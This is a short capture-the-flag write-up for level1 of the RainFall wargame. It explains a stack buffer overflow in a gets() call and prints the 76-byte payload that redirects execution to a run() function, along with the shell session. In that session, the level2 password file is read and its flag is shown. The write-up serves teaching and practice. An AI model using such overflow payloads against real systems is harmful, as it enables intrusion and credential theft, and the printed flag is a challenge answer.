# LEVEL1

```
(gdb) disas main
Dump of assembler code for function main:
   0x08048480 <+0>:	push   ebp
   0x08048481 <+1>:	mov    ebp,esp
   0x08048483 <+3>:	and    esp,0xfffffff0
   0x08048486 <+6>:	sub    esp,0x50
   0x08048489 <+9>:	lea    eax,[esp+0x10]
   0x0804848d <+13>:	mov    DWORD PTR [esp],eax
   0x08048490 <+16>:	call   0x8048340 <gets@plt>
   0x08048495 <+21>:	leave  
   0x08048496 <+22>:	ret    
End of assembler dump.
```

Open the program with Cutter, check fonction run(), address 0x08048444, use system()

You have to make a Buffer Overflow which will allow you to put the address of the run() function in the return to execute it and allow us to use the system() function call to get the flag


(little-endian)

python2 -c 'print("a"*76+"\x44\x84\x04\x08") > /tmp/file

level1@RainFall:~$ (cat /tmp/file ; cat) | ./level1
Good... Wait what?
cat /home/user/level2/.pass
53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77
 
